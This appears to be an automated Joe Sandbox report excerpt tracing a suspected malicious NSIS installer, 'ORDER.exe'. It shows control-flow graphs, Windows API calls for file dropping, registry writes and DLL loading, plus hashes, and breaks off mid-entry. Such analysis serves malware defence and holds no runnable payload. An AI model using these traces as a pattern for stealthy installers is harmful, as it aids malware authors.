                          control_flow_graph 745 40173f-401762 call 4029fd call 405833 750 401764-40176a call 405d36 745->750 751 40176c-40177e call 405d36 call 4057c6 lstrcatA 745->751 756 401783-401789 call 405fa1 750->756 751->756 761 40178e-401792 756->761 762 401794-40179e call 40603a 761->762 763 4017c5-4017c8 761->763 770 4017b0-4017c2 762->770 771 4017a0-4017ae CompareFileTime 762->771 764 4017d0-4017ec call 4059c7 763->764 765 4017ca-4017cb call 4059a2 763->765 773 401864-40188d call 40501f call 402f1f 764->773 774 4017ee-4017f1 764->774 765->764 770->763 771->770 786 401895-4018a1 SetFileTime 773->786 787 40188f-401893 773->787 775 4017f3-401835 call 405d36 * 2 call 405d58 call 405d36 call 40554a 774->775 776 401846-401850 call 40501f 774->776 775->761 809 40183b-40183c 775->809 788 401859-40185f 776->788 790 4018a7-4018b2 CloseHandle 786->790 787->786 787->790 791 40289b 788->791 794 402892-402895 790->794 795 4018b8-4018bb 790->795 793 40289d-4028a1 791->793 794->791 798 4018d0-4018d3 call 405d58 795->798 799 4018bd-4018ce call 405d58 lstrcatA 795->799 805 4018d8-40222b call 40554a 798->805 799->805 805->793 809->788 811 40183e-40183f 809->811 811->776
                          APIs
                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike,00000000,00000000,00000031), ref: 0040177E
                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike,00000000,00000000,00000031), ref: 004017A8
                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll), ref: 0040508D
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike$C:\Users\user\AppData\Local\Temp\nst4C1A.tmp$C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll$Call
                          • API String ID: 1941528284-2439645572
                          • Opcode ID: bbab41b7c65da336fcc9d622b469fe6745b6c4ed629919caf82812cee6b4992a
                          • Instruction ID: 7da2985f373e49f587e0f88560f455237d5d3a700d2e38046b33ad83bb6d7614
                          • Opcode Fuzzy Hash: bbab41b7c65da336fcc9d622b469fe6745b6c4ed629919caf82812cee6b4992a
                          • Instruction Fuzzy Hash: 0341B871910515BACF10BFA5DC46DAF3679DF41369F20823BF511F10E1D63C8A419A6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 812 40501f-405034 813 4050ea-4050ee 812->813 814 40503a-40504c 812->814 815 405057-405063 lstrlenA 814->815 816 40504e-405052 call 405d58 814->816 818 405080-405084 815->818 819 405065-405075 lstrlenA 815->819 816->815 821 405093-405097 818->821 822 405086-40508d SetWindowTextA 818->822 819->813 820 405077-40507b lstrcatA 819->820 820->818 823 405099-4050db SendMessageA * 3 821->823 824 4050dd-4050df 821->824 822->821 823->824 824->813 825 4050e1-4050e4 824->825 825->813
                          APIs
                          • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                          • lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                          • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                          • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll), ref: 0040508D
                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll
                          • API String ID: 2531174081-85028365
                          • Opcode ID: fe51e3db3acd615496ccbf9ac5cad90a085764a87c5addfa2b073bf2a2aea827
                          • Instruction ID: 2b33129011dff48d1edd85efe61027b37dbb0349f6b457de8e93b882053e083c
                          • Opcode Fuzzy Hash: fe51e3db3acd615496ccbf9ac5cad90a085764a87c5addfa2b073bf2a2aea827
                          • Instruction Fuzzy Hash: C2219071900508BBDB119FA5CD84ADFBFB9EF14354F14807AF544B6290C2794E45DFA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 826 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 833 402892-4028a1 826->833 834 402368-402370 826->834 835 402380-402383 834->835 836 402372-40237f call 4029fd lstrlenA 834->836 840 402393-402396 835->840 841 402385-402392 call 4029e0 835->841 836->835 844 4023a7-4023bb RegSetValueExA 840->844 845 402398-4023a2 call 402f1f 840->845 841->840 848 4023c0-402496 RegCloseKey 844->848 849 4023bd 844->849 845->844 848->833 851 402663-40266a 848->851 849->848 851->833
                          APIs
                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst4C1A.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nst4C1A.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst4C1A.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CloseCreateValuelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp
                          • API String ID: 1356686001-157168020
                          • Opcode ID: b5d2e43241cc5f1c643ac0585cf0187cb16dde17b219008d57ea00b15267c4df
                          • Instruction ID: 937c1904c824b73ffe337d2eacc138a1f8ac1658d2030852d1a46e58dbdf142b
                          • Opcode Fuzzy Hash: b5d2e43241cc5f1c643ac0585cf0187cb16dde17b219008d57ea00b15267c4df
                          • Instruction Fuzzy Hash: D71172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 852 4015b3-4015c6 call 4029fd call 40585f 857 4015c8-4015e3 call 4057f1 CreateDirectoryA 852->857 858 40160a-40160d 852->858 865 401600-401608 857->865 866 4015e5-4015f0 GetLastError 857->866 860 401638-402181 call 401423 858->860 861 40160f-40162a call 401423 call 405d36 SetCurrentDirectoryA 858->861 873 402892-4028a1 860->873 861->873 875 401630-401633 861->875 865->857 865->858 869 4015f2-4015fb GetFileAttributesA 866->869 870 4015fd 866->870 869->865 869->870 870->865 875->873
                          APIs
                            • Part of subcall function 0040585F: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,004058CB,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,?,77232EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 0040586D
                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015DB
                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015F3
                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike,00000000,00000000,?), ref: 00401622
                          Strings
                          • C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike, xrefs: 00401617
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                          • String ID: C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike
                          • API String ID: 3751793516-4182428349
                          • Opcode ID: 2a622bc09443ca50187ba2ee159019b7cd2e59548df6293550867165e211735f
                          • Instruction ID: decf54c0780f34986dcb1f6dc2400c6331eb5c21fa926316ee50895bb5337331
                          • Opcode Fuzzy Hash: 2a622bc09443ca50187ba2ee159019b7cd2e59548df6293550867165e211735f
                          • Instruction Fuzzy Hash: CE11E931908150ABDB217F755D4496F67B4EA62365728473FF891B22D2C23C4D42E62E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 878 4059f6-405a00 879 405a01-405a2c GetTickCount GetTempFileNameA 878->879 880 405a3b-405a3d 879->880 881 405a2e-405a30 879->881 883 405a35-405a38 880->883 881->879 882 405a32 881->882 882->883
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405A0A
                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A24
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\user\Desktop\ORDER.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-107080664
                          • Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                          • Instruction ID: 2f7b9810ed7c5924072585cf2130ed1295747d9915b618abfa336aedeca5813d
                          • Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                          • Instruction Fuzzy Hash: C1F0E2327482487BDB008F1ADC44B9B7B9CDF91710F00C03BF904AA280D2B0A8008B68

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 884 100016bd-100016f9 call 10001a5d 888 1000180a-1000180c 884->888 889 100016ff-10001703 884->889 890 10001705-1000170b call 100021b0 889->890 891 1000170c-10001719 call 100021fa 889->891 890->891 896 10001749-10001750 891->896 897 1000171b-10001720 891->897 898 10001770-10001774 896->898 899 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 896->899 900 10001722-10001723 897->900 901 1000173b-1000173e 897->901 906 100017b2-100017b8 call 100023da 898->906 907 10001776-100017b0 call 10001559 call 100023da 898->907 923 100017b9-100017bd 899->923 904 10001725-10001726 900->904 905 1000172b-1000172c call 100027ec 900->905 901->896 902 10001740-10001741 call 10002aa7 901->902 915 10001746 902->915 911 10001733-10001739 call 1000258d 904->911 912 10001728-10001729 904->912 918 10001731 905->918 906->923 907->923 922 10001748 911->922 912->896 912->905 915->922 918->915 922->896 927 100017fa-10001801 923->927 928 100017bf-100017cd call 100023a0 923->928 927->888 930 10001803-10001804 GlobalFree 927->930 934 100017e5-100017ec 928->934 935 100017cf-100017d2 928->935 930->888 934->927 937 100017ee-100017f9 call 100014e2 934->937 935->934 936 100017d4-100017dc 935->936 936->934 938 100017de-100017df FreeLibrary 936->938 937->927 938->934
                          APIs
                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                          • GlobalFree.KERNEL32(00000000), ref: 10001768
                          • FreeLibrary.KERNEL32(?), ref: 100017DF
                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                            • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(?,7D8BEC45), ref: 100021E2
                            • Part of subcall function 1000258D: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FF
                            • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32238167410.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.32238142205.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238195639.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238224100.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_ORDER.jbxd
                          Similarity
                          • API ID: Global$Free$Alloc$Librarylstrcpy
                          • String ID:
                          • API String ID: 1791698881-3916222277
                          • Opcode ID: cd3a49c7226bd267e48e570e062e78a21ab1dc0dccc3f926e80528383bd8a00b
                          • Instruction ID: 946e86dc2be410c0748ecba0c1d48508df540d87c222276c6f0f58241c559a10
                          • Opcode Fuzzy Hash: cd3a49c7226bd267e48e570e062e78a21ab1dc0dccc3f926e80528383bd8a00b
                          • Instruction Fuzzy Hash: C5318B79408205DAFB41DF649CC5BCA37ECFB042D5F018465FA0A9A09ADF78A8458A60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 941 40303a-403063 GetTickCount 942 4031a4-4031ac call 402bda 941->942 943 403069-403094 call 4031cc SetFilePointer 941->943 948 4031ae-4031b3 942->948 949 403099-4030ab 943->949 950 4030ad 949->950 951 4030af-4030bd call 4031b6 949->951 950->951 954 4030c3-4030cf 951->954 955 403196-403199 951->955 956 4030d5-4030db 954->956 955->948 957 403106-403122 call 406161 956->957 958 4030dd-4030e3 956->958 964 403124-40312c 957->964 965 40319f 957->965 958->957 959 4030e5-403105 call 402bda 958->959 959->957 967 403160-403166 964->967 968 40312e-403144 WriteFile 964->968 966 4031a1-4031a2 965->966 966->948 967->965 971 403168-40316a 967->971 969 403146-40314a 968->969 970 40319b-40319d 968->970 969->970 972 40314c-403158 969->972 970->966 971->965 973 40316c-40317f 971->973 972->956 974 40315e 972->974 973->949 975 403185-403194 SetFilePointer 973->975 974->973 975->942
                          APIs
                          • GetTickCount.KERNEL32 ref: 0040304F
                            • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                          • WriteFile.KERNELBASE(0040A8A0,0040F4C0,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                          • SetFilePointer.KERNELBASE(0011A168,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: File$Pointer$CountTickWrite
                          • String ID:
                          • API String ID: 2146148272-0
                          • Opcode ID: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                          • Instruction ID: 01a25493adf58fb9a894681412e440a2e883d4234beea4965eba9eb13e735820
                          • Opcode Fuzzy Hash: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                          • Instruction Fuzzy Hash: CC414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389D52CB5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 976 401f68-401f74 977 401f7a-401f90 call 4029fd * 2 976->977 978 40202f-402031 976->978 987 401f92-401f9d GetModuleHandleA 977->987 988 401f9f-401fad LoadLibraryExA 977->988 979 40217c-402181 call 401423 978->979 985 402892-4028a1 979->985 987->988 991 401faf-401fbc GetProcAddress 987->991 988->991 992 402028-40202a 988->992 993 401ffb-402000 call 40501f 991->993 994 401fbe-401fc4 991->994 992->979 999 402005-402008 993->999 995 401fc6-401fd2 call 401423 994->995 996 401fdd-401ff4 call 100016bd 994->996 995->999 1007 401fd4-401fdb 995->1007 1002 401ff6-401ff9 996->1002 999->985 1000 40200e-402016 call 403727 999->1000 1000->985 1006 40201c-402023 FreeLibrary 1000->1006 1002->999 1006->985 1007->999
                          APIs
                          • GetModuleHandleA.KERNELBASE(00000000,?,?), ref: 00401F93
                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll), ref: 0040508D
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                          • LoadLibraryExA.KERNELBASE(00000000,?,?,?,?), ref: 00401FA3
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,?,?,?), ref: 0040201D
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                          • String ID:
                          • API String ID: 2987980305-0
                          • Opcode ID: 5319e110b6e8a5b1d5967b6e1ac55a36922c91fdf13baa78a076f75be2177e55
                          • Instruction ID: 23a464ffe6ca8440643a385a127484fd4ee8ad6b227fb7efa4d26ad3fc5b3ac3
                          • Opcode Fuzzy Hash: 5319e110b6e8a5b1d5967b6e1ac55a36922c91fdf13baa78a076f75be2177e55
                          • Instruction Fuzzy Hash: D7210872904211BACF107FA48E49A6E39B0AB44358F60823BF601B62D1D7BC4941AA6E
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                          • WriteFile.KERNELBASE(00000000,?,C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll, xrefs: 004024DD, 00402502
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: FileWritelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll
                          • API String ID: 427699356-3711738274
                          • Opcode ID: 7a3ba9340afd46c78bea2cb4cb31887ebc91b7920a860de9f64b3c7245c284d2
                          • Instruction ID: 4826b5ec7f58a8945af1d05ae4e09a11cd1e532a13e769836b40841c5f4177c7
                          • Opcode Fuzzy Hash: 7a3ba9340afd46c78bea2cb4cb31887ebc91b7920a860de9f64b3c7245c284d2
                          • Instruction Fuzzy Hash: 80F054B2A54244BFDB40ABA19E499EB66A4DB40309F10443FB141F61C2D5BC4941A66A
                          APIs
                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421500,Error launching installer), ref: 0040550E
                          • CloseHandle.KERNEL32(?), ref: 0040551B
                          Strings
